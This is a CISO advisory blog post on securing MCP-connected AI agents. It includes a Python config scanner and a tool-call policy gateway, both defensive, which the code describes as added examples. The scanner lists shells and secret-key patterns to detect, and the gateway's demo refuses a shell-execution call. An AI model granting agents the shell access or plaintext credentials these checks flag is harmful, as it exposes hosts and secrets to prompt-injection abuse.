The Thoughts of a CISO: Balancing AI Innovation with Security Guardrails

Advisory Services · Artificial Intelligence
2/25/2026
Javier Quintela, Senior Advisory Services Expert

With AI capabilities evolving at breakneck speed, I wanted to reflect on where we stand today and share my roadmap as a field CISO (vCISO) for integrating security into the heart of innovation.

1. How We Got Here: Key AI Milestones Shaping Today’s Security Risk

A bit of history: the evolution of AI has accelerated from simple text prediction to autonomous agency in less than a decade. It “began” in 2017 with Google’s landmark paper, “Attention Is All You Need,” which introduced the Transformer architecture and the “Attention” mechanism. This allows models to process vast amounts of data in parallel. That foundation led directly to the 2022 release of ChatGPT, often seen as the “iPhone moment” for AI through LLMs (Large Language Models), bringing sophisticated conversational capability into the public mainstream.

Even then, security teams were already considering emerging risks, such as prompt injection, and grappling with confidentiality concerns.

By 2023 and 2024, the technology became multimodal, giving models the native ability to “see” images and “hear” audio as fluently as they read text. That shift expanded both the landscape of AI usage and the potential impact of AI failure.

Then in 2025, we entered what I’d call the era of the agent, led by the Model Context Protocol (MCP) and Agentic Communication Protocols (ACP). These standards act as a universal “plug,” allowing AI to move beyond conversation and into action by accessing your data, connecting with other software, and autonomously completing complex tasks on your behalf.

The LLM boom has transformed productivity and natural language interaction. It has created genuine opportunity by accelerating processes and reducing friction, but it has also created new risks we must address.

To summarize the major milestones:

· 2017 (Concept of “Attention”): Google publishes “Attention Is All You Need.”

· 2022: First public release of an LLM via ChatGPT.

· November 2024 (MCP launch): Anthropic releases MCP, enabling universal connections to data sources (e.g., PostgreSQL, GitHub, Slack), marking the beginning of the end for proprietary integrations and reducing vendor lock-in.

· Throughout 2025 (ACP stabilization): IBM Research releases ACP in March 2025. The protocol gains traction and defines rules for dialogue between autonomous agents, supporting traceability of inter-AI decision-making.

· 2026 (Native interoperability): MCP becomes natively integrated into most enterprise productivity tools, turning the AI agent into a standard collaborator within the corporate IT ecosystem.

2. The Road to (Autonomous) Agents

MCP has quickly moved from “interesting idea” to practical foundation for agentic workflows. This is already happening in the real world, with tools that are reshaping how people build, troubleshoot, and operate day-to-day.

· Claude-code, Gemini-cli or Open-code: We’re seeing a wave of terminal-native agentic interfaces that leverage MCP to bridge the gap between static code and live environments. By connecting to MCP servers, these tools can transform a standard shell into a reasoning engine capable of querying databases, searching documentation, and executing builds with stronger environmental awareness.

Some of these tools include built-in capabilities (e.g., a file explorer) that are not technically MCP servers today. However, these functions can be replaced by MCP servers over time, and that transition is likely to accelerate as standardization increases.

· Zed, Cursor or Windsurf: AI-native IDEs like Cursor and Windsurf represent the first wave of native MCP integration (2025). They go beyond autocomplete by enabling AI to interact directly with infrastructure through Docker, Kubernetes, or Jira MCP servers. This supports faster diagnosis and remediation in real time, directly inside the coding context.

· OpenClaw (formerly Moltbot, then Clawbot): High-autonomy orchestrators inspired by Claude Cowork are designed to run as background daemons. OpenClaw shifts the paradigm from reactive, user-triggered AI to proactive, event-triggered AI. By monitoring security tickets or system logs, these agents can autonomously gather context via MCP and prepare draft remediations before a human operator even opens the ticket.

The concept isn’t new, but standardization makes it far easier to implement. That ease has created a viral buzz. For some, it feels like magic. For others, it triggers fear, often framed through a “Terminator-like AI” lens.

A notable adjacent experiment is Clawbook, a side project from the author of OpenClaw. It’s positioned as a social orchestration lab, originally designed as an AI-only “Reddit” for agent-to-agent discourse and as a testing ground for multi-agent negotiation. While recent API leaks suggest a hybrid human-AI presence, the core value remains the study of how autonomous agents share MCP-derived context to solve complex, multi-step problems.

3. Risks of MCP-Connected AI Agents

If the LLM is the brain, MCPs are the hands. In 2026, giving LLMs access to your production systems and tools without control is like leaving your data center doors wide open in the name of “workflow fluidity.”

Using tools augmented by MCP requires new rigor from the CISO, even though the underlying risks are familiar. In practice, the main risks cluster into three areas.

Local context exposure.

Unlike a web chatbot, an agent such as Claude Code or Gemini-cli runs with the user’s local privileges. A malicious prompt injection could trigger unauthorized command execution on the host machine.

Skill supply chain risk.

We need to audit the ecosystem of community MCP servers with the same rigor we apply to any new system component, such as a new microservice. Validating these connectors is essential to prevent API key exposure and the misuse of critical functions, while maintaining clear oversight of resource access. This applies equally to the built-in functions of your agents.

Strategic isolation gaps.

For sensitive projects, dedicated containers and isolated virtual machines should be the standard. This limits the potential impact of agents operating with elevated access.

4. A CISO Roadmap to Secure Agentic AI and MCP Adoption

Innovation and transformation must remain the primary drivers of organizational success. The objective is to facilitate AI adoption responsibly, by implementing governance frameworks that align with the current landscape of MCP-enabled tools and agentic workflows.

To do that well, I recommend a phased approach that builds visibility first, then applies strong access controls, and finally scales governance as adoption grows.

Phase 1 (Immediate and short term): Establish inventory and visibility.

Start by building a clear picture of what is in use today and what is being introduced. That includes the LLMs your teams are using, the AI clients in play and their built-in functions, and the data sources or tools you intend to expose through secure MCP servers.
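One way to start the inventory in practice is to read the MCP server definitions out of the AI clients' own configuration files and flag the items a reviewer should look at first. The script below is an added example, not code from this post or from any MCP client; it assumes the common `mcpServers` JSON layout (server name mapped to `command`, `args` and `env`) and uses two constructed config files in which every package name, path and credential is a placeholder. Beyond listing what is configured, it surfaces the supply-chain and secret-handling signals discussed in section 3: servers fetched from a package registry at launch, unpinned package versions, credentials embedded in connection URLs or stored as plaintext environment values, and a shell used as the server command.

```python
"""Inventory the MCP servers each AI client is configured to launch and flag
risk signals worth reviewing.

Added example, not code from the page or from any MCP client. It assumes the
common `mcpServers` JSON layout used by desktop and IDE MCP clients
(name -> command/args/env); the two sample config files below are constructed,
and every package name, path and credential in them is a placeholder.
"""
from __future__ import annotations

import json
import re
from dataclasses import dataclass, field

# Constructed sample configs, keyed by the file an inventory job read them from.
SAMPLE_CONFIGS: dict[str, str] = {
    "claude_desktop_config.json": json.dumps({
        "mcpServers": {
            # Unpinned package fetched from a registry at launch, with a
            # database password embedded in the connection URL.
            "postgres": {
                "command": "npx",
                "args": ["-y", "@example/mcp-server-postgres",
                         "postgresql://app:example-password@db.internal/prod"],
            },
            # Pinned package, but a plaintext token in the environment block.
            "github": {
                "command": "npx",
                "args": ["-y", "@example/mcp-server-github@2.1.0"],
                "env": {"GITHUB_TOKEN": "ghp_EXAMPLE_PLACEHOLDER"},
            },
        }
    }),
    ".cursor/mcp.json": json.dumps({
        "mcpServers": {
            # Locally installed binary; the secret is a reference, not a literal.
            "docs": {"command": "/opt/mcp/docs-server", "args": ["--readonly"],
                     "env": {"DOCS_API_KEY": "${DOCS_API_KEY}"}},
            # A shell as the server command gives the agent arbitrary command execution.
            "shell": {"command": "bash", "args": ["-c", "./tools/shell-mcp"]},
        }
    }),
}

SECRET_KEY_RE = re.compile(r"TOKEN|SECRET|PASSWORD|API_?KEY", re.IGNORECASE)
# scheme://user:password@host ... i.e. a credential embedded in a URL argument
URL_CRED_RE = re.compile(r"^[a-z][a-z0-9+.-]*://[^/@\s]+:[^/@\s]+@", re.IGNORECASE)
SHELLS = {"bash", "sh", "zsh", "cmd", "cmd.exe", "powershell", "pwsh"}
REGISTRY_RUNNERS = {"npx", "uvx", "pipx"}   # run a package fetched from a registry


@dataclass
class ServerRecord:
    client: str
    name: str
    command: str
    args: list[str]
    signals: list[str] = field(default_factory=list)


def assess(record: ServerRecord, env: dict[str, str]) -> None:
    """Append risk signals to the record; the order is fixed so results are comparable."""
    cmd = record.command.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if cmd in SHELLS:
        record.signals.append("shell-command")
    if cmd in REGISTRY_RUNNERS:
        record.signals.append("registry-fetch")
        positional = [a for a in record.args if not a.startswith("-")]
        pkg = positional[0] if positional else ""
        # "@scope/name@1.2.3" or "name@1.2.3" is pinned; a bare name resolves to latest.
        if pkg and "@" not in pkg.lstrip("@"):
            record.signals.append("unpinned-package")
    if any(URL_CRED_RE.match(a) for a in record.args):
        record.signals.append("credential-in-args")
    for key, value in env.items():
        # "${VAR}" style references are resolved by the client; literals are the problem.
        if SECRET_KEY_RE.search(key) and value and not value.startswith("${"):
            record.signals.append(f"plaintext-secret:{key}")


def inventory(configs: dict[str, str]) -> list[ServerRecord]:
    """Parse each client config and return one assessed record per MCP server."""
    records: list[ServerRecord] = []
    for client, raw in configs.items():
        for name, spec in json.loads(raw).get("mcpServers", {}).items():
            rec = ServerRecord(client, name, spec.get("command", ""),
                               [str(a) for a in spec.get("args", [])])
            assess(rec, spec.get("env", {}))
            records.append(rec)
    return records


def flagged(records: list[ServerRecord]) -> list[ServerRecord]:
    """Records that carry at least one signal, i.e. the review queue."""
    return [r for r in records if r.signals]


if __name__ == "__main__":
    for r in inventory(SAMPLE_CONFIGS):
        print(f"{r.client:28} {r.name:10} {r.command:22} {', '.join(r.signals) or 'ok'}")
```

In a real deployment the `SAMPLE_CONFIGS` dictionary would be replaced by the config files collected from developer workstations and CI runners, and the resulting records fed into the asset inventory so that each MCP server has an owner and a review date like any other integration.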

Phase 2 (Mid term): Apply Zero Trust principles to MCP access.

Treat each AI client application and MCP server as a privileged integration point. Assign only the permissions required for the specific workflows and enforce the Principle of Least Privilege. Access should be explicit, scoped, and continuously reviewed.

Phase 3 (Ongoing): Keep a human in the loop for high-risk actions.

Supervision is the most reliable safeguard against the risks of increased autonomy and AI model inaccuracies (also called “hallucinations”). Human-in-the-loop approvals for critical operations are non-negotiable, provided they are structured to be both risk-appropriate and operationally realistic, that is, built into a workflow teams can actually follow. Maintaining this balance is a key leadership priority for organizations exploring advanced agentic workflows.

Phase 4 (Standardize as you scale): Introduce control layers for consistency and governance.

Even if the category is still maturing, LLM gateways (with implementations like ‘LiteLLM’ or ‘Bifrost’) have emerged as a great abstraction layer for modern AI stacks. By decoupling the consumption layer from the provider API, these proxies serve as a centralized enforcement point for rate-limiting, cost attribution, and schema validation. Furthermore, they act as a vital intermediary for MCP server interactions, facilitating standardized state management and secure tool-calling across heterogeneous model environments. Much like traditional web proxies, these platforms centralize policy enforcement, auditing, and logging. However, leadership must carefully evaluate the trade-offs: such centralization can in some cases introduce operational bottlenecks or single points of failure. Implementation must be supported by robust functional testing, and complemented by appropriate redundancy measures and business continuity planning.
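Phases 2 to 4 describe one control layer from three angles: least-privilege scopes per AI client, a human approval step for high-risk actions, and a central point that validates and logs every tool call. The gateway below is an added example that is not code from this post, from LiteLLM, Bifrost or any other product; the tool names, client names, risk ratings and scope rules are all constructed for illustration. What it shows is that the decision comes from policy rather than from whatever the model was told in its prompt: a tool outside a client's scope is refused even if the agent asks for it, a high-risk tool returns `pending_approval` until a human decides, malformed or out-of-scope arguments are rejected before anything reaches an MCP server, and every decision lands in an audit trail.

```python
"""Policy gate for MCP tool calls: per-client least-privilege scopes, argument
validation, a human-in-the-loop step for high-risk tools, and an audit trail.

Added example, not code from the page, from LiteLLM, Bifrost or any other
gateway. Tool names, client names, risk ratings and scope rules are all
constructed for illustration.
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Callable


@dataclass(frozen=True)
class ToolSpec:
    risk: str                                   # "low": auto-allow, "high": human approval
    schema: dict[str, type]                     # required argument -> expected type
    constraint: Callable[[dict], bool] = lambda args: True   # extra scope rule on args


# Constructed tool catalogue (hypothetical tool names).
TOOLS: dict[str, ToolSpec] = {
    "db.read": ToolSpec("low", {"sql": str, "limit": int},
                        lambda a: a["sql"].lstrip().upper().startswith("SELECT")
                        and 0 < a["limit"] <= 1000),
    "jira.comment": ToolSpec("low", {"issue": str, "body": str}),
    "k8s.restart_pod": ToolSpec("high", {"namespace": str, "pod": str},
                                lambda a: a["namespace"] != "kube-system"),
    "shell.exec": ToolSpec("high", {"cmd": str}),
}

# Constructed per-client scopes: anything not listed is not callable at all.
CLIENT_SCOPES: dict[str, frozenset[str]] = {
    "cursor-dev": frozenset({"db.read", "jira.comment"}),
    "openclaw-triage": frozenset({"db.read", "jira.comment", "k8s.restart_pod"}),
}

Approver = Callable[[str, str, dict], bool]     # (client, tool, args) -> approved?


@dataclass
class Decision:
    status: str     # "allow" | "deny" | "pending_approval"
    reason: str


def validate_args(spec: ToolSpec, args: dict) -> str | None:
    """Return an error string if args do not match the tool's schema, else None."""
    missing = sorted(set(spec.schema) - set(args))
    extra = sorted(set(args) - set(spec.schema))
    if missing:
        return f"missing args: {missing}"
    if extra:
        return f"unexpected args: {extra}"
    for name, expected in spec.schema.items():
        # exact type match: bool is an int subclass and must not pass as one
        if type(args[name]) is not expected:
            return f"arg {name!r} must be {expected.__name__}"
    if not spec.constraint(args):
        return "argument constraint failed"
    return None


class ToolGateway:
    """Sits between AI clients and MCP servers; every decision is logged."""

    def __init__(self, approver: Approver | None = None) -> None:
        self.approver = approver
        self.audit: list[dict] = []

    def _decide(self, client: str, tool: str, args: dict, status: str, reason: str) -> Decision:
        self.audit.append({"client": client, "tool": tool, "args": dict(args),
                           "status": status, "reason": reason})
        return Decision(status, reason)

    def authorize(self, client: str, tool: str, args: dict) -> Decision:
        scope = CLIENT_SCOPES.get(client)
        if scope is None:
            return self._decide(client, tool, args, "deny", "unknown client")
        if tool not in scope:
            return self._decide(client, tool, args, "deny", "tool outside client scope")
        spec = TOOLS.get(tool)
        if spec is None:
            return self._decide(client, tool, args, "deny", "unknown tool")
        error = validate_args(spec, args)
        if error:
            return self._decide(client, tool, args, "deny", error)
        if spec.risk == "high":
            if self.approver is None:
                return self._decide(client, tool, args, "pending_approval", "human approval required")
            if not self.approver(client, tool, args):
                return self._decide(client, tool, args, "deny", "rejected by approver")
            return self._decide(client, tool, args, "allow", "approved by human")
        return self._decide(client, tool, args, "allow", "low risk, within scope")


if __name__ == "__main__":
    gw = ToolGateway()
    print(gw.authorize("cursor-dev", "db.read", {"sql": "SELECT 1", "limit": 10}))
    print(gw.authorize("openclaw-triage", "k8s.restart_pod", {"namespace": "payments", "pod": "api-1"}))
    print(gw.authorize("cursor-dev", "shell.exec", {"cmd": "id"}))
```

The `approver` callback is where the human-in-the-loop workflow plugs in (a ticket, a chat approval, a break-glass procedure); with no approver configured the call simply waits, which is the safe default. The audit list stands in for whatever log sink the gateway ships to, and because the gate is a single process it also illustrates the trade-off the text raises: it needs the same redundancy and testing as any other choke point.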

5. Final Thoughts: Building Trusted AI With MCP, ACP, and Governance

Standardization through MCP and ACP, paired with a clear inventory of LLMs and AI clients, forms the foundation of Trusted AI. Adopting these frameworks does not hinder innovation. It helps CISOs design it in a way that scales, with security built in from the start.

Want to accelerate AI adoption without widening your risk surface?

Kudelski Security can help you assess your current AI and agentic exposure, design practical guardrails around MCP/ACP-enabled workflows, and build a Trusted AI foundation that scales.

Get in touch with our team to start the conversation.
